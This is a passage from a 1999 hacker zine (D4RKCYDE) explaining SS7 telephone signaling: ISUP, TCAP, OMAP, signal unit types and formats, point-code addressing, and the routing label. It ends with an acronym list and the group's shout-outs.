Title Translation is also used at the STP to share load among mated SCPs in
both normal and failure scenarios. In these instances, when messages arrive
at an STP for final global title translation and routing to a database, the
STP can select from among available redundant SCPs. It can select an SCP on
either a priority basis (referred to as primary -- backup) or so as to
equalize the load across all available SCPs (referred to as load sharing).

ISDN User Part (ISUP)

The ISDN user part defines the messages and protocol used in the
establishment and tear down of voice and data calls over the public switched
network, and to manage the trunk network on which they rely. Despite its
name, ISUP is used for both ISDN and non-ISDN calls. In the North American
version of SS7, ISUP messages rely exclusively on MTP to transport messages
between concerned nodes.

Transaction Capabilities Application Part (TCAP)

The transaction capabilities application part defines the messages and
protocol used to communicate between applications (deployed as subsystems) in
nodes. It is used for database services such as calling card, 800, and AIN as
well as switch-to-switch services including Repeat Dialing and Call Return.
Because TCAP messages must be delivered to individual applications within the
nodes they address, they use the SCCP for transport.

Operations, Maintenance and Administration Part (OMAP)

The operations, maintenance, and administration part defines messages and
protocol designed to assist administrators of the SS7 network. To date, the
most fully developed and deployed of these capabilities are procedures for
validating network routing tables and for diagnosing link troubles. OMAP
includes messages that use both the MTP and SCCP for routing.


10. What Goes Over the Signaling Link

Signaling information is passed over the signaling link in messages, which
are called signal units (SUs). Three types of signal units are defined in the
SS7 protocol:

Message signal units (MSUs)

Link status signal units (LSSUs)

Fill-in signal units (FISUs)

Signal units are transmitted continuously in both directions on any link that
is in service. A signaling point that does not have MSUs or LSSUs to send
will send FISUs over the link. The FISUs perform the function suggested by
their name; they "fill up" the signaling link until there is a need to send
purposeful signaling. They also facilitate link transmission monitoring and
the acknowledgment of other SUs.

All transmission on the signaling link is broken up into 8-bit bytes,
referred to as octets. Signal units on a link are delimited by a unique 8-bit
pattern known as a flag. The flag is defined as the 8-bit pattern "01111110".
Because of the possibility that data within a signal unit would contain this
pattern, bit manipulation techniques are used to ensure that the pattern does
not occur within the message as it is transmitted over the link. (The signal
unit is reconstructed once it has been taken off the link, and any bit
manipulation is reversed.) Thus, any occurrence of the flag on the link
indicates the end of one signal unit and the beginning of another. While in
theory two flags could be placed between SUs (one to mark the end of the
current message and one to mark the start of the next message), in practice a
single flag is used for both purposes.


11. Addressing in the SS7 Network

Every network must have an addressing scheme, and the SS7 network is no
different. Network addresses are required so that a node can exchange
signaling nodes to which it does not have a physical signaling link. In SS7,
addresses are assigned using a three level hierarchy. Individual signaling
points are identified as belonging to a "cluster" of signaling points. Within
that cluster, each signaling point is assigned a "member" number. Similarly,
a cluster is defined as being part of a "network." Any node in the American
SS7 network can be addressed by a three-level number defined by its network,
cluster, and member numbers. Each of these numbers is an 8-bit number and can
assume values from 0 to 255. This three-level address is known as the "point
code" of the signaling point.

Network numbers are assigned on a nationwide basis by a neutral party.
Regional Bell operating companies (RBOCs), major Independent telephone
companies and interexchange carriers already have network numbers assigned.
Since network numbers are a relatively scarce resource, companies' networks
are expected to meet certain size requirements in order to be assigned a
network number. Smaller networks can be assigned one or more cluster numbers
within network numbers 1, 2, 3, and 4. The smallest networks are assigned
"point codes" within "network number" 5. The cluster to which they are
assigned is determined by the state in which they are located. The network
number 0 is not available for assignment and network number 255 is reserved
for future use.

In short, "point code" is the term used to describe the three-level address
number created by combining the network, cluster, and member numbers. A point
code uniquely identifies a signaling point within the American SS7 network
and is used whenever it is necessary to address that signaling point.


12. Signal Unit Structure

Signal units of each type follow a format unique to that type. A high-level
view of those formats is shown in Figure 8.

Figure 8: Signaling Unit Formats

All three SU types have a set of common fields that are used by MTP Level 2.
They are as follows:

Flag

Flags delimit SUs. A flag marks the end of one SU and the start of the next.

Checksum

The checksum is an 8-bit sum intended to verify that the SU has passed across
the link error-free. The checksum is calculated from the transmitted message
by the transmitting signaling point and inserted in the message. On receipt,
it is recalculated by the receiving signaling point. If the calculated result
differs from the received checksum, the received SU has been corrupted. A
retransmission is requested.

Length Indicator

The length indicator indicates the number of octets between itself and the
checksum. It serves both as a check on the integrity of the SU and as a means
of discriminating between different types of SUs at level 2. As can be
inferred from Figure 8, FISUs have a length indicator of 0; LSSUs have a
length indicator of 1 or 2 (currently all LSSUs have a length indicator of 1)
and MSUs have a length-indicator greater than 2. According to the protocol,
only 6 of the 8 bits in the length indicator field are actually used to store
this length; thus the largest value that can be accommodated in the length
indicator is 63. For MSUs with more than 63 octets following the length
indicator, the value of 63 is used.

BSN/BIB FSN/FIB

These octets hold the backwards sequence number (BSN), the backwards
indicator bit (BIB), the forward sequence number (FSN), and the forward
indicator bit (FIB). These fields are used to confirm receipt of SUs and to
ensure that they are received in the order in which they were transmitted.
They are also used to provide flow control. MSUs and LSSUs, when transmitted,
are assigned a sequence number that is placed in the forward sequence number
field of the outgoing SU. This SU is stored by the transmitting signaling
point until it is acknowledged by the receiving signaling point.

Since the 7 bits allocated to the forward sequence number can store 128
distinct values, it follows that a signaling point is restricted to sending
128 unacknowledged SUs before it must await an acknowledgment. By
acknowledging an SU, the receiving node frees that SU's sequence number at
the transmitting node, making it available for a new outgoing SU. Signaling
points acknowledge receipt of SUs by placing the sequence number of the last
correctly received and in-sequence SU in the backwards sequence number of
every SU they transmit. In that way, they acknowledge all previously received
SUs as well. The forward and backwards indicator bits are used to indicate
sequencing or data-corruption errors and to request retransmission.


13. What are the Functions of the Different Signaling Units?

FISUs themselves have no information payload. Their purpose is to occupy the
link at those times when there are no LSSUs or MSUs to send. Because they
undergo error checking, FISUs facilitate the constant monitoring of link
quality in the absence of signaling traffic. FISUs can also be used to
acknowledge the receipt of messages using the backwards sequence number and
backwards indicator bit.

LSSUs are used to communicate information about the signaling link between
the nodes on either end of the link. This information is contained in the
status field of the SU (see Figure 8). Because the two ends of a link are
controlled by independent processors, there is a need to provide a means for
them to communicate. LSSUs provide the means for performing this function.
LSSUs are used primarily to signal the initiation of link alignment, the
quality of received signaling traffic, and the status of the processors at
either end of the link. Because they are sent only between the signaling
points at either end of the link, LSSUs do not require any addressing
information.

MSUs are the workhorses of the SS7 network. All signaling associated with
call setup and tear down, database query and response, and SS7 network
management takes place using MSUs. MSUs are the basic envelope within which
all addressed signaling information is placed. As will be shown below, there
are several different types of MSUs. All MSUs have certain fields in common.
Other fields differ according to the type of message. The type of MSU is
indicated in the service-information octet shown in Figure 8; the addressing
and informational content of the MSU is contained in the signaling
information field.


14. Message Signal Unit Structure

The functionality of the message signal unit lies in the actual content of
the service information octet and the signaling information field (see Figure
8).

The service information octet is an 8-bit field (as might be inferred from
its name) that contains three types of information as follows:

1.Four bits are used to indicate the type of information contained in the
signaling information field. They are referred to as the service indicator.
The values most commonly used in American networks are outlined in Table 2.

Table 2: Common Signaling Indicator Values

Value
Function
0
Signaling Network Management
1
Signaling Network Testing and Maintenance
3
Signaling Connection Control Part (SCCP)
5
ISDN User Part (ISUP)


2.Two bits are used to indicate whether the message is intended (and coded) f
or use in a national or international network. They are generally coded
with a value of 2, national network.

3.The remaining 2 bits are used (in American networks) to identify a message
priority, from 0 to 3, with 3 being the highest priority. Message
priorities do not control the order in which messages are transmitted; they
are only used in cases of signaling network congestion. In that case, they
indicate whether a message has sufficient priority to merit transmission
during an instance of congestion and/or whether it can be discarded en
route to a destination.

The format of the contents of the signaling information field is determined
by the service ndicator. (Within user parts, there are further distinctions
in message formats, but the service indicator provides the first piece of
information necessary for routing and/or decoding the message.)

The first portion of the signaling information field is identical for all
MSUs currently in use. It is referred to as the routing label. Simply stated,
the routing label identifies the message originator, the intended destination
of the message, and a field referred to as the signaling-link selection field
which is used to distribute message traffic over the set of possible links
and routes. The routing label consists of 7 octets that are outlined below in

Table 3 (in order of transmission):
Table 3: Routing Label


Octet Group Function Number of Octets
Involved
Destination Point Code
(DPC)
Contains the address of the node to
which the message is being sent
3 octets
Originating Point Code
(OPC)
Contains the address of message
originator
3 octets
Signaling Link Selection
(SLS)
Distributes load among redundant routes
1 octet


Point codes consist of the three-part identifier (network #, cluster #,
member #), which uniquely identifies a signaling point.


16. Acronym List


ACM Address Complete Message
ANM Answer Message
A Links Access Links
BIB Backward Indicator Bit
B Links Bridge Links
BSN Backward Sequence Number
D Links Diagonal Links
DPC Destination Point Code
E Link Extended Link
F Link Fully Associated Link
FIB Forward Indicator Bit
FISU Fill in Signal Unit
FSN Forward Sequence Number
IAM Initial Address Message
ISDN Integrated Services Digital Network
ISUP ISDN User Part
KPBS Kilobits per Second
LSSU Link Status Signal Unit
Mf Multifrequency
MSU Message Signal Unit
MTP Message Transfer Part
OMAP Operations, Maintenance and Administration Part
OPC Originating Point Code
PSTN Public Switched Telephone Network
RBOC Regional Bell Operating Company
REL Release Message
RCL Release Complete Message
RSP Route Set Prohibited Test Message
RSR Restricted Test Message
SS7 Signaling System 7
SCCP Signaling Connection Control Part
SCP Signal Control Point
SLS Signaling Link Selection
SSP Signal Switching Point
STP Signal Transfer Point
SU Signal Unit
TCAP Transaction Capabilities Application Part
TFA Transfer Allowed Message
TFP Transfer Prohibited Message
TFR Transfer Restricted Message


Well, thats it. Shouts to d4rkcyde, 9x, b4b0, eVolution, downt1me, elf,
substance, lowtek, digiphreak, gr1p, t1p, euk. darkcyde.8m.com.

[----> ghost in the shell bbs <----]
[----> o11 +44 (o)1xxx xxxxxx <----]
[----> 24 hours. d4rkcyde (c) <----]

g1ts.login:


---(OOooOO)--------Outness----------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


Werd, thats it for this issue. Thanks to everyone who submited shit, hopefuly
next issue we'll have even more :> Keep on c0nf1n, k33p drink1ng l04dz 0f
c4fF3n3, be 3l337.



[C] 1999 D4RKCYDE Communications. darkcyde.8m.com #darkcyde EfNet.




← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT